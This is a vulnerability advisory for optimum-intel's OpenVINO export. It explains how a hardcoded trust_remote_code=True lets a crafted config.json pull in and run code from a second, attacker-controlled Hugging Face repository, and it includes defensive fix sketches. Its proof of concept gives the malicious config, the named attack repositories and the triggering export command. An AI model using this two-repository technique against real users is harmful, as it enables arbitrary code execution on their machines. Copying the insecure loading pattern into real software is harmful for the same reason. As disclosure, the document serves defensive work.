Description
optimum-intel contains a remote code execution vulnerability in the OpenVINO export of multimodal models. LlavaQwen2OpenVINOConfig and Phi3VisionOpenVINOConfig unconditionally call AutoConfig.from_pretrained(..., trust_remote_code=True) on the repository named by config.mm_vision_tower and config.img_processor["model_name"], respectively.
At first glance this may look acceptable, because the real llava-qwen2/phi3_v architecture normally requires custom remote code. However, this assumption is unsafe. Taking LlavaQwen2OpenVINOConfig as an example, an attacker can publish a seemingly normal model repository, set export_model_type to llava-qwen2, and set the mm_vision_tower field in config.json so that it points to an attacker-controlled backend repository. When a user runs the normal OpenVINO export command, optimum-intel initializes LlavaQwen2OpenVINOConfig, fetches the attacker-controlled backend config with trust_remote_code=True, and executes the remote code shipped in that repository.
This creates a stealthy two-repository attack. The frontend repository can look benign and contain only a crafted config.json, while the actual malicious code is stored in a separate backend repository. As a result, the attack can mislead users and bypass existing security checks that focus only on the frontend repo.
This issue can be triggered through the standard optimum-cli export openvino workflow. That makes the attack practical against ordinary users who are simply trying to convert a model and do not realize that the export step itself can execute attacker-controlled code.
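To make the two-repository pattern concrete, here is a minimal sketch of a pre-export check that lists config fields pointing at a repository other than the one being exported. The function name find_external_repo_refs and the repository ids in the usage lines are hypothetical. The set of inspected fields covers only the two named in this report and is not claimed to be exhaustive.

```python
from typing import Any, Dict, List


def find_external_repo_refs(config: Dict[str, Any], frontend_repo: str) -> List[str]:
    """Return repository ids referenced by the config that differ from frontend_repo.

    Only the two fields discussed in this report are inspected (an assumption
    made for illustration): mm_vision_tower and img_processor["model_name"].
    """
    refs: List[str] = []

    tower = config.get("mm_vision_tower")
    if isinstance(tower, str):
        refs.append(tower)

    img_processor = config.get("img_processor")
    if isinstance(img_processor, dict):
        model_name = img_processor.get("model_name")
        if isinstance(model_name, str):
            refs.append(model_name)

    # Anything that is not the repository being exported deserves a manual look.
    return [ref for ref in refs if ref != frontend_repo]


# Hypothetical repository ids, used only to exercise the function.
config = {
    "model_type": "llava",
    "export_model_type": "llava-qwen2",
    "mm_vision_tower": "attacker/backend-repo",
}
print(find_external_repo_refs(config, "attacker/frontend-repo"))
```

A check like this only surfaces the cross-repository reference. It does not decide whether the referenced repository is safe.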
Root Cause
The vulnerable code is:
self._behavior = behavior
self._orig_config = config
if self._behavior == VLMConfigBehavior.VISION_EMBEDDINGS:
    config = AutoConfig.from_pretrained(config.mm_vision_tower, trust_remote_code=True)
    if hasattr(config, "vision_config"):
        config = config.vision_config
and
if self._behavior == Phi3VisionConfigBehavior.VISION_EMBEDDINGS and hasattr(config, "img_processor"):
    self._config = AutoConfig.from_pretrained(
        config.img_processor["model_name"], trust_remote_code=True
    ).vision_config
    self._normalized_config = self.NORMALIZED_CONFIG_CLASS(self._config)
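Both snippets hardcode trust_remote_code=True regardless of what the user requested. One possible direction for a fix, shown here only as a sketch and not as the maintainers' patch, is to forward the user's own choice to the nested load. The helper name load_nested_config and its loader parameter are hypothetical. The loader is injectable so the sketch can be exercised without network access.

```python
from typing import Any, Callable, Optional


def load_nested_config(
    repo_id: str,
    trust_remote_code: bool = False,
    loader: Optional[Callable[..., Any]] = None,
) -> Any:
    """Load a nested config, forwarding the caller's trust_remote_code choice.

    Hypothetical helper: by default it delegates to
    transformers.AutoConfig.from_pretrained, but it never upgrades the flag
    to True on its own.
    """
    if loader is None:
        # Imported lazily so the sketch can be tested with a stub loader.
        from transformers import AutoConfig

        loader = AutoConfig.from_pretrained
    return loader(repo_id, trust_remote_code=trust_remote_code)
```

With this shape, a nested repository that ships custom code would presumably be rejected by transformers unless the user explicitly opted in to remote code for the export.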
The export path also allows attacker-controlled models to reach this class:
if hasattr(model.config, "export_model_type"):
    model_type = model.config.export_model_type
else:
    model_type = model.config.model_type
submodel_paths = export_from_model(
    model=model,
    output=output,
    task=task,
    ov_config=ov_config,
    stateful=stateful,
    model_kwargs=model_kwargs,
    custom_export_configs=custom_export_configs,
    fn_get_submodels=fn_get_submodels,
    preprocessors=preprocessors,
    device=device,
    trust_remote_code=trust_remote_code,
    patch_16bit_model=patch_16bit,
    **kwargs_shapes,
)
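The selection logic above can be reproduced in isolation to show why a crafted config.json reaches the vulnerable class. The sketch below mirrors only the if/else from the snippet. The function name select_model_type and the use of SimpleNamespace as a stand-in for the model config are assumptions made for illustration.

```python
from types import SimpleNamespace


def select_model_type(config) -> str:
    """Mirror the export path: export_model_type, when present, wins over model_type."""
    if hasattr(config, "export_model_type"):
        return config.export_model_type
    return config.model_type


# Stand-in for the frontend repository's config from the proof of concept.
frontend = SimpleNamespace(model_type="llava", export_model_type="llava-qwen2")
print(select_model_type(frontend))  # llava-qwen2

# Without the extra field, the declared model_type is used.
plain = SimpleNamespace(model_type="llava")
print(select_model_type(plain))  # llava
```

Because export_model_type comes straight from the repository's config.json, the repository author decides which export config class is instantiated.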
Proof of Concept
I created two Hugging Face repositories for demonstration.
The frontend repository, XManFromXlab/optimum-intel-LlavaQwen2OpenVINOConfig-benign, contains a crafted config.json:
{
  "model_type": "llava",
  "export_model_type": "llava-qwen2",
  "mm_vision_tower": "XManFromXlab/optimum-intel-LlavaQwen2OpenVINOConfig-evil"
}
The backend repository, XManFromXlab/optimum-intel-LlavaQwen2OpenVINOConfig-evil, contains attacker-controlled code that will be loaded through AutoConfig.from_pretrained(..., trust_remote_code=True).
Then run the normal export command:
optimum-cli export openvino \
  --model XManFromXlab/optimum-intel-LlavaQwen2OpenVINOConfig-benign \
  --task image-text-to-text \
  ./tmpdir
During export, optimum-intel reads the frontend model config, sees export_model_type: "llava-qwen2", and initializes LlavaQwen2OpenVINOConfig. Inside that class, it executes:
AutoConfig.from_pretrained(config.mm_vision_tower, trust_remote_code=True)
Since mm_vision_tower points to the attacker-controlled backend repository, i.e., XManFromXlab/optimum-intel-LlavaQwen2OpenVINOConfig-evil, remote code from that repository is fetched and executed. This leads to arbitrary code execution on the victim host during the normal export workflow.
$ optimum-cli export openvino --model XManFromXlab/optimum-intel-LlavaQwen2OpenVINOConfig-benign --task image-text-to-text ./tmpdir
Execute Malicious Payload!!!
Execute Malicious Payload!!!
Execute Malicious Payload!!!
Source locations of the two vulnerable snippets shown under Root Cause (optimum-intel, commit e17aa5a): optimum/exporters/openvino/model_configs.py, lines 2187 to 2192 (LlavaQwen2OpenVINOConfig) and lines 3079 to 3083 (Phi3VisionOpenVINOConfig).